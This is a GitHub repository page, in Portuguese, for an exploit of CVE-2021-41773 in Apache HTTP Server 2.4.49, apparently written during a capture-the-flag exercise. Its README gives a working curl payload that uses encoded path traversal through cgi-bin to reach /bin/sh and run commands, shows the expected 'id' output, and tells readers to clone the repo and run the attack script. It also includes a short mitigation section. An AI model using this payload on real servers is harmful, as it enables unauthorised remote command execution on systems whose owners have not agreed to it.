Skip to content

Apache 2.4.49 | exploit This code was created during a ctf in which I was solving.

License

Notifications You must be signed in to change notification settings

luismede/apache2.4.49-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Apache 2.4.49 Exploit - Path Traversal & RCE (CVE-2021-41773)

License: MIT

Este repositório contém um exploit de Path Traversal e Remote Code Execution (RCE) que explora a vulnerabilidade encontrada na versão Apache HTTP Server 2.4.49, conhecida como CVE-2021-41773. A vulnerabilidade permite acesso não autorizado a arquivos e a execução de comandos no servidor, se as permissões não estiverem corretamente configuradas.

Descrição

A vulnerabilidade aproveita uma falha no tratamento de URIs pelo servidor Apache, permitindo que usuários mal-intencionados realizem ataques de path traversal para acessar arquivos fora do diretório raiz e, em certos casos, executar comandos remotamente. O exploit foi originalmente descoberto por Ash Daulton e pela equipe de segurança do cPanel.

  • Data da Descoberta: 10/05/2021
  • Exploit Testado em: Apache 2.4.49
  • CVE: CVE-2021-41773
  • Vulnerabilidade: Execução Remota de Código (RCE) e Path Traversal
  • Autor do Exploit: Lucas Souza https://lsass.io

Requisitos

Para que o ataque seja bem-sucedido, é necessário:

  1. O módulo mod_cgi habilitado no Apache.
  2. Permissões de execução adequadas no diretório /bin/ ou equivalente.
  3. O servidor não deve ter as permissões corretamente configuradas para negar acessos externos (por exemplo, require all denied).

Verificando se o servidor é vulnerável

Use o comando curl abaixo para verificar se o servidor está vulnerável:

curl 'http://IP_DO_SERVIDOR/cgi-bin/.%32%65/.%32%65/.%32%65/.%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Se o servidor estiver vulnerável, você receberá uma resposta como esta:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Instruções para Uso

  1. Clone este repositório:
git clone https://github.com/luismede/apache2.4.49-exploit
cd apache2.4.49-exploit
  1. Execute o script de exploit fornecido no repositório para realizar o ataque RCE.

Mitigação

A vulnerabilidade foi corrigida na versão Apache 2.4.50. Recomenda-se atualizar o servidor imediatamente para essa versão ou uma posterior. Alternativamente, a aplicação de regras de segurança mais rigorosas no arquivo de configuração do Apache (como require all denied) pode mitigar o risco.

Licença

Este projeto está licenciado sob a MIT License.

About

Apache 2.4.49 | exploit This code was created during a ctf in which I was solving.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages